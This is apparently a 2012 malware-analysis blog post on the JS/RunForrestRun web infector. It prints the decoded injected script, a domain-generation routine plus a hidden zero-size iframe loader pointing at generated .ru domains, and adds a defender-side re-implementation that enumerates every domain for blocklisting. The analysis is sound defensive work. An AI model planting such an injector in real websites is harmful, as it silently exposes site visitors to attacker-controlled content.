Monday, October 29, 2012

The crusaders' note: Suspected JS/RunForrestRun aka PseudoRandom's NEW bad actor scheme is ongoing..

Following the previous blog posts on the PseudoRandom or JS/RunForrestRun infector cases, in this Crusade we found that the new bad actor's scheme is spreading new infections using this malicious obfuscated random-domain infector.
We released the details in our pastebin here: --->>[PASTEBIN], and summarize them as follows:
NEW infectors have been popping up since Oct 26th on a batch of compromised sites (the full list of infected URLs is in the pastebin).
The decoded PseudoRandom script (recovered from the hex-encoded payloads) is as follows:
// Lehmer-style generator; note Q and R are computed with floating-point division
function nextRandomNumber(){
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  if (test > 0){
    this.seed = test;
  }
  else {
    this.seed = test + this.M;
  }
  return (this.seed * this.oneOverM);
}
// Seed is derived only from the month, day of month and an after-noon flag
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * r.next() + Min);
}
// Builds the random-looking host name for the given time and TLD
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i++){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}
// After 500 ms, injects a hidden 0x0 iframe pointing at the generated .ru domain (once per page)
setTimeout(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      iframeWasCreated = true;
      var unix = Math.round(+new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "h00p://" + domainName + "/runforestrun?sid=botnet2");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  }
  catch (e){
  }
}, 500);
All the generated URLs were extracted with the timestamp each one is tied to; the complete list of URLs is pasted here: --->>[PASTEBIN]
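As an added example (not code from the original post or from the malware itself), here is a clean re-implementation of the decoded generator, written from the defender's side so the full set of domains the script can produce can be precomputed for a blocklist or sinkhole and matched against proxy logs. The names dgaSeed, nextRandom, generateDomain, enumerateDomains and domainForUtc are my own; domainForUtc assumes UTC, whereas the real script reads the victim's local clock.

```javascript
// Added example, not the post's or the malware's code: a defender-side
// re-implementation of the decoded generator; names are my own, constants
// and arithmetic mirror the script exactly.
// The seed depends only on month (0-11), day of month and an am/pm flag
// (1 when hour > 12): year, minutes and seconds never influence it.
function dgaSeed(month, date, pm) {
  return 2345678901 + month * 0xFFFFFF + date * 0xFFFF + Math.round(pm * 0xFFF);
}

// One generator step. Q and R use floating-point division as the script
// does; an integer Schrage implementation would yield a different sequence.
function nextRandom(state) {
  const A = 48271, M = 2147483647, Q = M / A, R = M % A;
  const hi = state.seed / Q;
  const lo = state.seed % Q;
  const test = A * lo - R * hi;
  state.seed = test > 0 ? test : test + M;
  return state.seed * (1.0 / M); // always in (0, 1]
}

function generateDomain(month, date, pm, length = 16, zone = 'ru') {
  const state = { seed: dgaSeed(month, date, pm) };
  const letters = 'abcdefghijklmnopqrstuvwxyz';
  let str = '';
  for (let i = 0; i < length; i++) {
    str += letters[Math.round((letters.length - 1) * nextRandom(state))]; // createRandomNumber(rand, 0, 25)
  }
  return str + '.' + zone;
}

// Every domain the script can produce in a year: 12 months x 31 days x 2
// half-days, so the whole space is only 744 names per TLD.
function enumerateDomains(zone = 'ru') {
  const out = [];
  for (let m = 0; m < 12; m++) {
    for (let d = 1; d <= 31; d++) {
      for (let pm = 0; pm <= 1; pm++) {
        out.push({ month: m, date: d, pm, domain: generateDomain(m, d, pm, 16, zone) });
      }
    }
  }
  return out;
}

// For matching proxy logs by time. The script reads the victim's local clock;
// UTC is assumed here so results are reproducible across machines.
function domainForUtc(unixSeconds, zone = 'ru') {
  const d = new Date(unixSeconds * 1000);
  return generateDomain(d.getUTCMonth(), d.getUTCDate(), d.getUTCHours() > 12 ? 1 : 0, 16, zone);
}
```

Because the seed ignores the year, the same 744 names recur every year, which is why a one-off enumeration is enough to block or sinkhole the whole scheme for this TLD.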
The morals of these findings are: 1. This time PseudoRandom gave us not just extracted domains BUT full infected URLs. 2. Double or maybe triple obfuscation was found in the recent PseudoRandom landing HTML.

#MalwareMustDie! (Special thanks to EO for great crack!!)
